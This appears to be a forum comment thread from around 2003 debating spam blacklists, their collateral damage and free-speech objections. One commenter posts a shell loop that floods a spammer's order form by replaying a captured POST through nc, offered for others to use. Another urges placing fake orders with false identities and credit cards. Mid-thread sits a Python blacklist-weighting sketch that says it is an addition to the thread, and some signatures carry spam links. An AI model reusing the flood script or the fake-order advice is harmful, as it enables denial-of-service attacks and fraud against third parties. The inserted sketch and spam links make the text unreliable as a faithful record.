We should focus instead on content-based spam filtering, and share that knowledge to improve efficiency. Accuracy skyrockets and collateral damage virtually disappears! You can use intelligent software like spamprobe to classify mail as spam, for instance. There's also the Distributed Checksum Clearinghouse, which lets mail servers around the world determine what's spam based on collective mail data.
A million mail servers sharing with each other what they know about the appearance of this week's spam would be killer. I'd love to see that.
.. your eminent truthfulness. I think total blocking of any compromised machines makes perfect sense, I wish it was so complete of a "blockage" or blacklisting that those machines couldn't surf. This will cause calls to ISPs and tech support. Eventually it will be discovered that this internet user's car is leaking toxic waste onto the information super highway. Machine gets fixed, driver gets a good education on proper maintenance.
Why is this wrong? Where would it be harmful in the long run to both educate and properly secure ALL the users and computers that connect to the net? Let's think longer range here. SPAM (and viruses and worms and etc) is/are everyone's problem who uses the net, so the solution will require everyone's cooperation. Where is it carveth in stone that SPAM, and the solution to thereof, should only be restricted to a few harried and dedicated volunteers and sys admins? I say, share the pain, share the rewards.
There is no good, bad, or indifference to the use of RBL lists. They are currently the only way to combat, what is in essence, criminal behaviour. There are no first amendment rights issues involved here. Read it for yourself if you think otherwise, (http://www.billofrights.org/).
These people steal bandwidth and services from both the originating and the receiving companies and ISPs. They peddle blatantly false products (Are you stupid enough to think that you can enlarge the flaccid size of your penis by swallowing a pill?), dubious services (Would you re-finance the mortgage on your home with someone who uses an advertiser that steals services from someone?), and porn (If you want it, go find it yourself.).
As a mail system admin, I have to deal with this on a daily basis. It gets worse every month (or 42 days) and I see no real relief coming anytime soon from either the states or the feds, because they are so slow on the uptake. So my feeling is this, if you're on this list of jerks (http://www.spamhaus.org/rokso/index.lasso), then you're blocked, period. If you're in China, Korea, or Brazil, move. If you're an e-mail marketer, change professions. If you're a real spammer like this jerk (http://news.com.com/2100-1032_3-1001513.html?tag=fd_top), think about a new profession. Soon.
If you happen to be a real company or user that has an account with or a site hosted by any of the ISPs that host these jerks and refuses to do anything about them, you're blocked until they're gone or you change providers. When you do change, remember to tell your ISP *WHY* you're changing to a different company.
I do have a bit of sympathy for Mr. Haselton, but not much. I'm sure MAPS tested his server for relay capability. He would have noticed if he, or his admin, was reading the logs. They do give you a month to fix your problem/appeal. If he got caught out from no fault of his own, like it seems he did, he could change to a different ISP. Did he even try?
I've got your sig, right here.
Adding a blacklist at the receiving end will only help the user using it, and one can only hope that spammers will eventually realize that much of their traffic is simply not getting through, and figure out a different sort of scam to pull on people. Unfortunately this doesn't solve some of the more serious problems with spam, such as congestion of mail servers and backbone pipes. I've heard some statistics quoted that some 80% of traffic on much of the core routers appears to be spam. A blacklist in the sense being described is no solution to this at all.
Much better would be blacklists for known open relays, and strong (i.e. cryptographic) authentication for mail servers. This is arguably not censorship, as you're merely cutting off those people who aren't good neighbors, people who don't bother to play nice with everyone else, which is what the Internet really is all about. The RFC's are just rules we all agreed to have, and anyone who doesn't bother to follow them is in effect voluntarily cutting himself or herself off from everyone who does follow the rules.
I think that much of the spam is going through illicit channels and channels made by careless fools who don't bother to read the RFC's. Cutting off such bad neighbors will go a long way towards curbing the spam problem.
Qu'on me donne six lignes écrites de la main du plus honnête homme, j'y trouverai de quoi le faire pendre.
Of course, if the government (any government) wanted to mandate blacklists, it would be a horrible idea! And I'd be right along with everyone else -- against it.
Now that that's off my chest, I think the biggest misunderstanding about DNS blacklists is how to use them. Most sites use them as absolute blocks. That is, if any relay on an incoming email is found in a single blacklist, then that message is blocked. I've tested hundreds of blacklists and no single blacklist that includes any appreciable number of spammer IP addresses is absolutely reliable.
The solution is technical and simple: use more than one blacklist. Weight them. Use math and statistics to achieve good results based on past accuracy rates. Don't use the ones that work poorly such as SPEWS which has a poor false positive rate, or just weight them much lower than better blacklists.
Incidentally, this is exactly the approach that SpamAssassin takes. We let our genetic algorithm decide what weight to use for each blacklist. It's not perfect, but boy, does it help keep spam out of our inboxes! Actually, this is the SpamAssassin philosophy about email filtering in general. We don't place all our bets on any single filtering method. We use every method at our disposal and let statistical methods decide what works best and how to weight them. If spam evolves, we evolve. If the attacks on Bayesian filtering prove to be too powerful, we'll have other methods to fall back on. Sorry for the advertisement, but I think the "all or none" approach is exactly why some people are so against blacklists. That's also why most legislative anti-spam proposals are such incredibly bad ideas.
Daniel
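The contrast drawn in the comment above, between blocking on any single blacklist hit and weighting several lists by their past accuracy, as an added sketch that is not part of the original post and is not SpamAssassin's code. It uses a log-likelihood-ratio weight per list instead of SpamAssassin's genetic algorithm; the zone names, the labelled history, the threshold and the offline resolver are all constructed assumptions.

```python
import ipaddress
import math

# Constructed zone names for illustration; they are not real blacklists.
ACCURATE = "accurate.dnsbl.example"
BROAD = "broad.dnsbl.example"
ZONES = [ACCURATE, BROAD]


def dnsbl_query_name(ip, zone):
    """DNSBL lookup name: the IPv4 octets reversed, followed by the list's zone."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def zones_listing(relays, zones, is_listed):
    """Zones that list at least one relay IP of a message.

    is_listed(name) stands in for a DNS A query, so the example runs offline.
    """
    return {z for z in zones for ip in relays if is_listed(dnsbl_query_name(ip, z))}


def learn_weights(history, zones, smoothing=1.0):
    """Weight per zone = log(P(hit | spam) / P(hit | ham)) from labelled mail.

    history is a list of (zones_that_hit, is_spam) pairs. Smoothing keeps a
    list with no recorded false positives from getting an infinite weight.
    """
    spam_total = sum(1 for _, is_spam in history if is_spam)
    ham_total = len(history) - spam_total
    weights = {}
    for zone in zones:
        spam_hits = sum(1 for hits, is_spam in history if is_spam and zone in hits)
        ham_hits = sum(1 for hits, is_spam in history if not is_spam and zone in hits)
        p_spam = (spam_hits + smoothing) / (spam_total + 2 * smoothing)
        p_ham = (ham_hits + smoothing) / (ham_total + 2 * smoothing)
        weights[zone] = math.log(p_spam / p_ham)
    return weights


def absolute_block(hits):
    """The 'any relay on any list' policy."""
    return bool(hits)


def weighted_block(hits, weights, threshold):
    """Block only when the summed weights of the lists that hit reach the threshold."""
    return sum(weights[z] for z in hits) >= threshold


def error_counts(history, blocks):
    """Return (legitimate mail blocked, spam let through) for a blocking policy."""
    ham_blocked = sum(1 for hits, is_spam in history if not is_spam and blocks(hits))
    spam_missed = sum(1 for hits, is_spam in history if is_spam and not blocks(hits))
    return ham_blocked, spam_missed


def constructed_history():
    """100 spam and 100 legitimate messages with made-up hit patterns."""
    history = []
    for i in range(100):
        spam_hits = set()
        if i < 60:
            spam_hits.add(ACCURATE)   # lists 60% of spam, no legitimate mail
        if i % 10 < 7:
            spam_hits.add(BROAD)      # lists 70% of spam ...
        history.append((spam_hits, True))
        # ... and 30% of legitimate mail
        history.append(({BROAD} if i % 10 < 3 else set(), False))
    return history


HISTORY = constructed_history()
WEIGHTS = learn_weights(HISTORY, ZONES)
THRESHOLD = 2.0  # assumed cut-off, chosen for this constructed data

# Constructed listings (documentation address ranges).
LISTED = {
    dnsbl_query_name("192.0.2.25", BROAD),
    dnsbl_query_name("198.51.100.7", ACCURATE),
}


def is_listed(name):
    return name in LISTED


if __name__ == "__main__":
    print(WEIGHTS)
    print("absolute:", error_counts(HISTORY, absolute_block))
    print("weighted:", error_counts(HISTORY, lambda h: weighted_block(h, WEIGHTS, THRESHOLD)))
    hits = zones_listing(["203.0.113.5", "192.0.2.25"], ZONES, is_listed)
    print(hits, absolute_block(hits), weighted_block(hits, WEIGHTS, THRESHOLD))
```

On this constructed data the weighted policy stops blocking legitimate mail at the cost of missing more spam, which is why the comment pairs blacklist scores with other filtering methods.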
Who pays for the bandwidth
I've noticed that when I've opened HTML SPAM that the servers are pretty well /.ed, the images load slow as hell, usually I can open and delete them before the first image is loaded, so apparently the businesses that hire the spammers aren't paying for bandwidth either!
Apocalypse Cancelled, Sorry, No Ticket Refunds
You could at least *scan* today's headlines before sticking your own thumb in your ass, though.
Right now, I would settle for *any* authentication of mail servers. Even something as simple minded as adding a DNS record that verifies that a server is authorized to send email for a domain would be a *huge* step forward at the moment.
It's ridiculous that they can spam anyone as anyone through open relays and proxies, so that we can't determine their real identity.
If free speech included the right to be heard, then everyone who doesn't own a computer that can receive your messages is also censoring you...
If 90% of the internet decides that they don't want to receive anything from you...
Sucks to be you.
We're not talking about one person, or even one group, deciding who does and doesn't get to speak. Spam blacklists only work because each ISP that uses the black list decides that it should work for them. If they don't like who is on the black list, they'll use a different one.
Perfect system? Of course not. Better than no system? Yeah.
Stomping "your rights"? No way. There's no "right" to be connected to the internet. The internet, past your connection, is EVERYONE ELSE'S computers. You don't have any greater right to speak there than you do in the New York Times.
paintball
You just probably won't get much email until you teach your friends, customers, etc. to send their email that way.
- Chris
paintball
By that logic we might conclude that amoebic dysentery shouldn't exist either. :)
A parasite is a parasite is a parasite. Spammers are ideally suited to the internet environment at the moment--that's why this entire discussion is about trying to alter that environment to make it less livable (hopefully, outright fatal) to them.
After all, in some way the spammers are DOS'ing the internet as a whole, increasing the demand and use of potentially shared resources such as bandwidth, mail servers and so on. As often happens there does not seem to be any reasonable way to actually charge them for these resources. Legal solutions seem unlikely to work - and given the legal solutions we've seen proposed recently, are likely to even make things worse.
So, what can the average user do? Things like spam filtering on the client don't solve the whole problem.
So, do what you can. Go to any website mentioned and order a dozen or dozen dozen of their product. Don't use your own credit card or real name or address - after all they don't. Send them a couple hundred emails complaining. (Though you'll notice that most spammer products don't have accessible email addresses.) If they're in China send email to each new spammer with addresses of all the previous Chinese spammers and talk about support for Free Tibet and the Falun Gong.
Do such actions feel unethical to me? Yup. And I'll admit that I don't usually do such things myself - although between spammers and telemarketers I'm getting closer and closer to serious nastiness. But do we have a choice? If the choice is to respond to spam with DOS or the recently proposed sleazy way to legalize mass email marketing, which choice will make email usable for people?
It's the prisoner's dilemma (or the tragedy of the commons) over and over again, sadly. The best solution must be to make the payoff for "defectors" lower or make their cost higher.
whois onlinedns.org gives all those not available messages, so which host do I use to actually get real information? I've tried a few with no luck.
I'd like to send them some feedback.
A traceroute does hint that they're in china.
Yes, followed right over a cliff with the baby and the bathwater.
Hooray for principles!
Thanks for reminding me why I don't donate to the EFF.
i spam their order-databases...
/dev/null
:-)
i'll soon rewrite this script to randomize all data, such as headers etc. anyone know if tcp-spoof is possible?
-----
#!/bin/sh
tmpid=1
while [ 1 ]; do
cat victim.txt|sed s/_ID_/$tmpid/g|nc victim.com 80 &>
echo $tmpid
tmpid=`expr $tmpid + 1`
done
---
not very cool code, but it does its job. victim.txt is a logfile from sniffit when i POST their order-form on their website.
have fun buying stuff!
I am part of the collateral damage.
Because of black lists and a dial-up connection, I can not use my home server to send email to a friend of mine who uses earthlink or to subscribe to a number of SourceForge mailing lists. At work, I can not receive email from my wife or daughter, because they use web.de addresses.
Neither my wife, my daughter nor I have had anything to do with spamming, yet we are limited in our ability to use the internet to communicate with each other or with our friends. This limitation is due to conditions which are almost completely out of our hands to control or to correct. Who is going to compensate us for our loss of use? Why are our rights sacrificed and written off as a necessary part of gaining a greater good?
Some here will no doubt argue that I should pressure my ISP to stop supporting spam. They want the anti-spammers' denial of service and use to rouse me to take up their cause. I should join them on the barricades. I am not going to do this because:
1) I don't have the time or resources to fight this.
2) I don't think my ISP has violated my rights. I think Julian Haight, et al. have violated my rights by taking from me functionality I have a valid reason to expect from my ISP.
3) I think that the anti-spammers have held a huge kangaroo court in which I have been unjustly tried and jailed.
Bureaucracy loves company.
You don't seem to see the difference between the courts holding an ISP responsible and users shunning an ISP. Since everybody loves analogies when we talk about spam, how about this one:
Your local mall rents space to the Ku Klux Klan. I can boycott the KKK store, but it's pretty meaningless, since I already have a de facto boycott against them. Should the mall be forced by law to kick out the Klan? No, why should the government be involved in this private transaction? Will I want to be seen entering a mall that has a Klan store? Will I feel safe there? Will I want my family to visit that mall? No, no, and no. Boycotting the mall hurts the taco stand in the food court, but I still wouldn't visit.
Boycotting the ISP is the same as private citizens boycotting the mall. They enable something I feel is immoral. There are people in the world who would boycott an entire ISP for hosting a pr0n site. More power to 'em. I disagree, but they have the right to do it.
I'm a contractor for a company that sends out a free gift in exchange for signing up for my client's mailing list when they make a purchase. Our list of customers is now quite large at 60,000 plus email addresses. The problem we've had with spam cop is that some customers will forget (several months after the fact) that they ever signed up for the list in the first place and report our flier as spam. It seems that once one person reports you as a spammer there is nothing you can do to clear your name. Every email that we send is to a prior customer and a link and 800 number are provided to remove yourself from the list.
Is it possible to use email for commercial purposes without being labeled a spammer?
Buy my shit at http://www.cellup.com
And I don't understand the comments either.. uncomfortable political views are a necessity if you believe that democracy should always have its way, yet, people don't like the Hitlers, the Saddams, and the Bushes, and would rather live happily ever after and just not have to think about people like that messing up their lives. I can understand, but that indifference is growing to the extent that democracy and free speech are subject to limits. And I think that is wrong.
You constantly have to deal with bad practice of people, tell them they are wrong or unappreciated. But you have to give them the freedom to make the mistakes. Of course, when they do damage in any way to society, or their neighbouring societies, the fun should end.
my cents..
With great power comes great electricity bills.
It's flawed, simply because those things don't affect me. If somebody posts a copyright violating HTML file on a server I never look at, it doesn't directly waste my time, money or resources.
If they send me annoying email telling me they're doing this, it does.
(And, yes, wasting my time and money and resources because they're being used for something I don't want them to be used for. )
I run my own server. Tell me again how I am infringing on someone's right to free speech by electing to not receive their message?
I simply can't follow your logic.
It's my bandwidth, my server, my software, my electricity, and my choice to decide who I will talk to or not, right?
OK, let's say a spammer fakes an email to make it look like it came from your server, and you get put on the RBL.
It's your bandwidth, your server, your software, your electricity...and someone else has chosen to whom you can and cannot send email.
Would you support RBLs if you were an innocent victim? How would you feel being "collateral damage"?
Bureaucracy loves company.
how about mailing list and similar emails?
you can't add all the mailing list participants to a whitelist and many times the email comes from the user (the sender) not the mailing list address.
asking for all the mailing list to register in your mail server is also an impossible thing to do
Higuita
how about mailing list?
see my post here
Higuita
The censorship issue brought up in the article is not about the poor spammers' freedom of speech being infringed upon. It's about legitimate organizations like peacefire.org, who have found themselves on blacklists as "collateral damage" and have had a hellacious time getting off those lists due to the way blacklist maintainers (particularly SPEWS) tend to be anonymous and difficult to reach. A related problem that's brought up is the way anonymous list maintainers can, if they choose, put someone on their blacklist as part of a vendetta instead of for legitimate reasons.
-- To Err is human, to Ignignokt divine.
I must say that generally, I support blackholes, as long as a process of review exists. Blocking a whole block of IPs or even a single IP *forever* without appeal is simply not fair to follow-on users who get assigned a spammer's old IP address. When a spammer finds out he is blocked, he changes his address or ISP, so blackholes are only a temporary impediment to him. But what about a new subscriber to an ISP who gets assigned the old address? It's like moving to a new apartment and getting arrested by the police because a criminal *used-to* live at your apartment. There should be a clear method to say "please de-list me because I'm a new person at this address".
That article is complete bullshit.
First, if an e-mail is not delivered, the recipient receives a notice of the fact, as long as he is properly identified as the source of the e-mail.
Second, I have had a number of IP addresses in our range blocked by a whole host of different DNSBL, for many different reasons. The *ONLY* blacklists I never got removed from were those which block ranges for a whole region (like South America or Brazil).
Moreover, the process might take two or three days (though it's seldom more than 24 hours), but it's always VERY clear.
That article reads more as a pro-spam article in disguise.
(8-DCS)
Before putting RBLs into use spamassassin was catching between 50 and 80 spam a day. After the RBLs were made active it traps 5 or 6 a day. I hadn't put them in because I was worried about the high number of false entries but as long as I don't use ORBS things seem to work fine.
--
If I actually could spell I'd have spelled it right in the first place.
A "waste of resources" is too abstract for a potential anti-spam ally. Besides, since when is the US known for efficient use of resources? But if you make the issue clearcut -- as in "YOU ARE PAYING TO RECEIVE JUNK MAIL" -- the response in the general, out-of-the-know community might be different. Yeah, you've heard this before, but to the folks who might see spam as a speech issue, consider this: "Hi, I'm Wal-mart, I'm sending you some real mail. Please hand your mailman 50 cents for postage." By the way,
Wank it at SmoothPorn.
No, it's like buying goods that don't work. So the solution is to take it back to the vendor and complain. In this case, the ISP has knowingly given you tainted goods and taken your money for it. Since the contract for usage of the IP address is between you and the ISP, naturally it's the ISP you should approach. They then have the choice of either fixing their problem, or giving you a new IP address.
I agree with you that this is basically an ISP problem and that ISPs have responsibility to police their user-base. But what about an ISP who does finally clean up his act and eliminates the spammers on his sub-net? Shouldn't he have a process by which to get his addresses de-listed?
Haven't you ever heard of a newsgroup killfile? Guess what? They were around and extremely popular long before the "internet" went mainstream.
If I want to use someone's spam blacklist it's no different than if I want to use someone's killfile. You have the right to speak, but I don't have to listen.
Why should an ISP expect immediate removal? Surely if they take their time to eject a spammer from their networks they should expect likewise from the community? Considering blacklisting is used as a last resort when all other avenues - abuse reports, reeducation - have failed, why should it be an easy life? Why not avoid blacklisting in the first place and have a well monitored and working abuse department?
Why, the bucket of course...
ich bin der musikant
mit taschenrechner in der hand
kraftwerk
To the best of anyone's knowledge, SPEWS' approach is this:
1) Set up spamtrap addresses, seed them on Web and USENET
2) Receive spam: complain to ISP.
a) If spam stops, stop.
b) If spam continues, blacklist.
3) If spam still continues, expand blacklist by stages until the entire ISP is blocked.
4) Keep blacklist in place until
a) the ISP notices its problem and stops the spam
b) the ISP goes out of business
c) the Universe undergoes a heat death
Note that this is a LOT better than the alternative, where every mail admin runs his own blacklist. Such lists are virtually impossible to get out of, because nobody has the time to check for removals. I believe that a great deal of what was once AGIS IP space is still blocked at many sites, and that block is a 4c 'heat death' type.
Real Daleks don't climb stairs - they level the building.
I frequently get spammed on MSN, well actually using Gaim client on Linux with MSN protocol, from pr0n operators trying to get me to click on this webcam or that. Don't know if it's a weakness in the Gaim implementation or some vulnerability on the MSN server side.
Certainly not on the same scale as e-mail, but it does happen.
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
My question about all this is who anointed the black hole list holders to do this? In my (thankfully) few dealings with the managers of such lists I have found them to be smug, self righteous zealots who shoot first and ask questions later. Even worse are those who suspend their own responsibilities to their users by subscribing to their lists.
I can tell right away when a message is spam, just from the subject or the first few lines. So I would think that, say, a neural network or a set of genetic algorithms could be taught to recognize spam with good accuracy and delete it automatically.
No he would apply to get taken off like any reasonable person who is unjustifiably put into the list.
You're just mad because you use an ISP that is a known spam contributor and no-one wants to read the garbage coming from that domain
I firmly believe that anyone has the right to publish a list of who they believe are spammers.
What the article and most of the discussion fail to look at is the other side of the mail connection.
No one is preventing anyone from sending mail. What is happening is system administrators are choosing to follow the information that is published in BLs and then acting on that choice. The result is that some systems (individual computers, companies, or entire ISPs) will not receive mail that is on a BL. Again mail is not being prevented from being sent, it is prevented from being received.
Control over this is determined by who you receive your mail from, not by who is publishing the BL or who is sending the mail.
The discussion should not be about if BLs are good or bad, it should be asking the questions like:
You should substitute your company or organization's mail administrator for ISP above if your organization is maintaining its own mail servers.
If you are a mail system administrator your job is to choose a set of BLs that have policies that agree with your users (customers) needs and provide an appropriate balance between filtering and collateral damage. If you are an end user, your job is to patronize a service provider that filters appropriately for your needs. That is what you are paying the service provider to do for you; provide service.
What, you mean perform the job of being an ISP in a professional and competent manner? Oh, now, that's just crazy talk.
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
Try a search for "Montgomery bus boycott" on your search engine of choice.
Yes, some nations' laws are less clear on boycotts (Canada), and in the US, certain types of organized boycott are unlawful (e.g. a group boycott by businesses meant to stifle competition, or where boycotts are used in certain labor disputes). But a "pure" voluntary organized boycott is lawful in the US.
I do not deploy Linux. Ever.
Spammers will just team up with hackers with a few thousand machines that are "owned" to do the encryption, and then have those machines send out the mail via a few open relays, so they can keep their stable of machines "safe."
the grid: It isn't just for finding aliens any more.
"Has it been over a year since you last donated to the Electronic Frontier Foundation [eff.org]?"
I don't give money to spammers or spam supporters.
If anyone knows of an organization like the EFF which is not a spam apologist, please let me know, so that I can support it.
I may be wrong here but I recall choosing to use an RBL with my personal mail handler I was not forced. Since the community is sick of telemarketers, spammers, Instant Message spams and even spam in the mail I think it's high time we could at least have control over one of them.
Spam in the snailmail is a necessary evil so I can accept it. My apt complex is even courteous enough to provide a garbage can at the mailboxes so they can recycle all the wasted paper.
Personally I wish the big bells would go after people that are sending all the spam.
The problem with RBL's which undermines their value is often purely their own fault - overzealousness. SpamCop is definitely the worst here.
We run a moderate sized ASP, we host about 150 web sites for non-profit clients and send about 1.5m emails a week, all explicit sign up and opt-in, no spam of course.
Never a week goes by but we receive a SpamCop complaint, *not* about the emails we send, but about some email neither us nor our clients have ever seen or had anything to do with, that happens to mention one of their URLs in a tag line. The complaint goes not to the spammer or their ISP, not to our client or us, but the upstream provider.
SpamCop assumes that if an email is reported as spam, then any owner of any URL it links to is a spammer. This nonsense and flawed logic just wastes everyone's time. Just because some spammer in Taiwan likes Slashdot doesn't mean that Taco boy is a spammer.